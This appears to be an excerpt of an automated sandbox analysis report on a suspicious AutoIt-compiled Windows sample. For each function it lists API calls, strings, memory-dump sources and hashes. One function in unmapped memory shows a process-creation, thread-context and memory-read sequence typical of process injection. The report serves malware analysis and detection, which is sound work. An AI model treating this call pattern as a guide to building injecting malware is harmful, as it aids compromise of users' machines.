RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006A356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006E318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006E31CE
RegCloseKey.ADVAPI32(?), ref: 006E3210
_wcslen.LIBCMT ref: 006E3277
_wcslen.LIBCMT ref: 006E3286

Strings

Include, xrefs: 006E3184, 006E31C5
\Include\, xrefs: 006A3527
Software\AutoIt v3\AutoIt, xrefs: 006A3560
\, xrefs: 006E328C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 10296f6cae217e46fb32f7a7917ba3bb2c3cf9b591efb0248f4f1aa20ae54575
Instruction ID: 9901249b3358700decabd5d596b975ad354bac3ccb152ad9009dc86dfd31dfad
Opcode Fuzzy Hash: 10296f6cae217e46fb32f7a7917ba3bb2c3cf9b591efb0248f4f1aa20ae54575
Instruction Fuzzy Hash: 6F71D6714053109EC344EF25DC419ABB7F9FF85380F40842EF199972A2DB389A89CF69

Function 006A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006A2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 006A2B9D
LoadIconW.USER32(00000063), ref: 006A2BB3
LoadIconW.USER32(000000A4), ref: 006A2BC5
LoadIconW.USER32(000000A2), ref: 006A2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006A2BEF
RegisterClassExW.USER32(?), ref: 006A2C40

Part of subcall function 006A2CD4: GetSysColorBrush.USER32(0000000F), ref: 006A2D07
Part of subcall function 006A2CD4: RegisterClassExW.USER32(00000030), ref: 006A2D31
Part of subcall function 006A2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A2D42
Part of subcall function 006A2CD4: InitCommonControlsEx.COMCTL32(?), ref: 006A2D5F
Part of subcall function 006A2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A2D6F
Part of subcall function 006A2CD4: LoadIconW.USER32(000000A9), ref: 006A2D85
Part of subcall function 006A2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A2D94

Strings

0, xrefs: 006A2C0F
#, xrefs: 006A2C16
AutoIt v3, xrefs: 006A2C2F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 8a965fdbb1f148ca685559a4dd697c5323c4ee4739c7a8339a387adaf2777f11
Instruction ID: 8ba7275416eb54a887b87f87cb720034fed051115832802e736bdaeb63af6f5b
Opcode Fuzzy Hash: 8a965fdbb1f148ca685559a4dd697c5323c4ee4739c7a8339a387adaf2777f11
Instruction Fuzzy Hash: C1214C71E00314ABEB119FA9EC55B997FB4FB08B90F40C01AF508A66A0D3B90984CF98

Function 006A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,006A316A,?,?), ref: 006A31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,006A316A,?,?), ref: 006A3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006A3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,006A316A,?,?), ref: 006A3232
CreatePopupMenu.USER32 ref: 006A3246
PostQuitMessage.USER32(00000000), ref: 006A3267

Strings

TaskbarCreated, xrefs: 006A322D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d6974ec5d123213d006dd8ba36f56123adea462ec888840d7b223953b3c7da3a
Instruction ID: a8e8d26ab2283f7065e72dd2f01f83b1d1ec79a3575d8864015090e58de77b82
Opcode Fuzzy Hash: d6974ec5d123213d006dd8ba36f56123adea462ec888840d7b223953b3c7da3a
Instruction Fuzzy Hash: 41413A31240264ABEB153B7C9C1EBB9365FEB47380F448125FA0696391C7699F428FA9

Function 006ADFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%w, xrefs: 006F2FDA
D%w, xrefs: 006F302D
D%w, xrefs: 006AE4B1
D%wD%w, xrefs: 006AE27E
Variable must be of type 'Object'., xrefs: 006F32B7
D%w, xrefs: 006AE1E0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: D%w$D%w$D%w$D%w$D%wD%w$Variable must be of type 'Object'.
API String ID: 0-3922967373
Opcode ID: efe0a8cc96d5ce75af95dcc7fd66ce657cb498919dc02398aa0a3a394dbc2860
Instruction ID: ffeef7e262fbe13ef093022b089117fe5b5f5ae29ac576b71f656bc03060d99e
Opcode Fuzzy Hash: efe0a8cc96d5ce75af95dcc7fd66ce657cb498919dc02398aa0a3a394dbc2860
Instruction Fuzzy Hash: 9AC26E71A00215CFCB24EF58C880AADB7B2FF4A310F248569E915AB391D376ED82CF55

Function 006AEC40 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006AFE66

Strings

D%w, xrefs: 006AF36A
D%w, xrefs: 006F491E
D%w, xrefs: 006AEFB7
D%wD%w, xrefs: 006AF05B
D%w, xrefs: 006F4972

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%w$D%w$D%w$D%w$D%wD%w
API String ID: 1385522511-3872119899
Opcode ID: b08e8b66bef18a214911eb3083d964fb502ee1d49fbfdbab5a6888196080c428
Instruction ID: 6571857665a7385143f30235e3cd276c7cdef94c3a5275d68ac8b65d9b40f90b
Opcode Fuzzy Hash: b08e8b66bef18a214911eb3083d964fb502ee1d49fbfdbab5a6888196080c428
Instruction Fuzzy Hash: 25B27C74604340CFDB14EF58C480A6AB7E2BF9A310F24896DE9998B351D775ED82CF92

Function 016D5468 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016D5539
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016D575F

Memory Dump Source

Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
Instruction ID: 03129038d9e7abea4237032da804df2473978c023a55ee183a2bbd065af5f61e
Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
Instruction Fuzzy Hash: 99A12874E00219EBEB14CFA4D894BEEBBB5FF48304F208159E616BB290D7759A41CF54

Function 006A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006A2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006A2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,006A1CAD,?), ref: 006A2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,006A1CAD,?), ref: 006A2CCF

Strings

AutoIt v3, xrefs: 006A2C89, 006A2C8E, 006A2C8F
edit, xrefs: 006A2CAC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7d00eee0509e142176854120279c4be3ea08b07f1592a5916968099c553644d7
Instruction ID: 3669ee9fb0b0016539ebfa53d798443d640edb681a386b90643bb3a8f0e52219
Opcode Fuzzy Hash: 7d00eee0509e142176854120279c4be3ea08b07f1592a5916968099c553644d7
Instruction Fuzzy Hash: 0CF0DA756503947AEB31172BAC09E773EBDD7C6F90F41806AF908A25A0C6691890DBB8

Function 016D5268 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 016D5158: Sleep.KERNELBASE(000001F4), ref: 016D5169

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016D5355

Strings

2AO2KQ8QAEL9, xrefs: 016D53B8, 016D53BB

Memory Dump Source

Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd

Similarity

API ID: CreateFileSleep
String ID: 2AO2KQ8QAEL9
API String ID: 2694422964-2974333907
Opcode ID: 91787aa301791e46254a0c8560b42bbb9b8370fe39e4805e15942bc600435f7e
Instruction ID: 777e4f6fceb1179d3c85c3b13f7fd144d7edffba916133e63712d7ee2ccaad6e
Opcode Fuzzy Hash: 91787aa301791e46254a0c8560b42bbb9b8370fe39e4805e15942bc600435f7e
Instruction Fuzzy Hash: DF51A131D04249EBEF11DBA4CC18BEEBB79AF04300F004599E609BB2C1D7B91B45CBA6

Function 00712947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712C05
DeleteFileW.KERNEL32(?), ref: 00712C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00712C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712CC0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 3285887559431275b7482fd611d212feba65ff24f5dcd91d45835d2706988a25
Instruction ID: cc46a9c22739739b5abb486725945e7a3c1014e337fc8b54c3161ac9e504f3ea
Opcode Fuzzy Hash: 3285887559431275b7482fd611d212feba65ff24f5dcd91d45835d2706988a25
Instruction Fuzzy Hash: 87B16271900119ABDF11EFA4CC85EEE777DEF05350F1040AAF609E6182EA349E958FA4

Function 006D5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JOj, xrefs: 006D5BA8, 006D5C6C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: JOj
API String ID: 0-1489635976
Opcode ID: a906b44e9d5f2accd48c3a5788b20eab87234cbf0ff31ef1b00e9afe9125f880
Instruction ID: 89144d97bd16eed238273992dc78ebfb324f74592f393f54af0da76b7f3bfd63
Opcode Fuzzy Hash: a906b44e9d5f2accd48c3a5788b20eab87234cbf0ff31ef1b00e9afe9125f880
Instruction Fuzzy Hash: B851CC71D1060AABDB21AFA8C845FFEBBBAEF05310F14005FF406A7791D6758A02DB65

Function 006A3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B83

Strings

Control Panel\Mouse, xrefs: 006A3B3E

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 920c484920e910c027885b18d45bcea7972e6b0605e33e78b2edc87b0fb38aef
Instruction ID: c278095823588984c3545b34803c642b5e185ef8933137e974e1e6d8679d82fb
Opcode Fuzzy Hash: 920c484920e910c027885b18d45bcea7972e6b0605e33e78b2edc87b0fb38aef
Instruction Fuzzy Hash: 6B115AB5510218FFDB219FA4DC84AEEB7BAEF21740B108459B801E7210E3319E409B64

Function 016D4158 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016D4913
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016D49A9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016D49CB

Memory Dump Source

Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
Instruction ID: d11df70502c801db2411e2a6aff42fd214ed041171108a6a0106ff77978cfd3c
Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
Instruction Fuzzy Hash: EA62FB30E142589BEB24CBA4CC50BDEB776EF58300F1091A9D20DEB794EB759E81CB59

Function 006A2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 006E2C8C

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

Part of subcall function 006A2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A2DC4

Strings

X, xrefs: 006E2C5A
`ev, xrefs: 006E2C85

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`ev
API String ID: 779396738-137022389
Opcode ID: d32de77a6666c188ebe091fc969d945170d9f81737e6985bc958103aa5a33940
Instruction ID: 412f0e8ff1651df7d22665722c799b177f948582de0ee5dd77cd4f4f91568baf
Opcode Fuzzy Hash: d32de77a6666c188ebe091fc969d945170d9f81737e6985bc958103aa5a33940
Instruction Fuzzy Hash: 8321C671A002989BDB41EF98C805BEE7BFEAF49304F00805DE505B7241DFB85A898FA5

Function 006BFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 006C0668

Part of subcall function 006C32A4: RaiseException.KERNEL32(?,?,?,006C068A,?,00771444,?,?,?,?,?,?,006C068A,006A1129,00768738,006A1129), ref: 006C3304

__CxxThrowException@8.LIBVCRUNTIME ref: 006C0685

Strings

Unknown exception, xrefs: 006C0692

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 7b96867d8013c83f7760ef1c7ac9875456a11a71e0a7583b638fa25e6ce91ac8
Instruction ID: a1702f1184182b609d58283a6e73d5cfd1780fdd8833ab9c8d9f41e0c6814faf
Opcode Fuzzy Hash: 7b96867d8013c83f7760ef1c7ac9875456a11a71e0a7583b638fa25e6ce91ac8
Instruction Fuzzy Hash: B5F0F474900208B78F40BAA4DC46EED776EDE00300B60413DB814C16A2EF71DB568684

Function 00713017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0071302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00713044

Strings

aut, xrefs: 00713038

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: dd7e8893bbe8f651c8f45fd737fce027b20f8524c0caaf26900e22179a2930ea
Instruction ID: 8d380a8cbfcbf10de0ce1b07167216f253c52997878b15e6a74cee53ee1be31e
Opcode Fuzzy Hash: dd7e8893bbe8f651c8f45fd737fce027b20f8524c0caaf26900e22179a2930ea
Instruction Fuzzy Hash: D0D05B7250032467DA2097949C0DFC73A6CD704751F4042517A55E6091DAB49544CBD4

Function 00727F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007282F5
TerminateProcess.KERNEL32(00000000), ref: 007282FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 007284DD

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 7b7b0f9912f175dfd068cbb5be1be3e1964c2a114d720341a7c8b20518bb65f2
Instruction ID: 035dd4d5ec4bf6e9eda1754c248b224f32457306463f3fbb3c3a272e7b5c84e5
Opcode Fuzzy Hash: 7b7b0f9912f175dfd068cbb5be1be3e1964c2a114d720341a7c8b20518bb65f2
Instruction Fuzzy Hash: E5127A71908351DFC764DF28C484B2ABBE1BF89314F04895DE8998B252DB35ED45CF92

Function 006A10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A1BF4
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 006A1BFC
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A1C07
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A1C12
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 006A1C1A
Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 006A1C22

Part of subcall function 006A1B4A: RegisterWindowMessageW.USER32(00000004,?,006A12C4), ref: 006A1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006A136A
OleInitialize.OLE32 ref: 006A1388
CloseHandle.KERNEL32(00000000,00000000), ref: 006E24AB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 97da3df5d39c263585457795d888215002f7812d1f365fe58e47637eb41dcaec
Instruction ID: ec5668439cf32dee72379ae872fbad6b6886944502d5e21ddaab597258f90f35
Opcode Fuzzy Hash: 97da3df5d39c263585457795d888215002f7812d1f365fe58e47637eb41dcaec
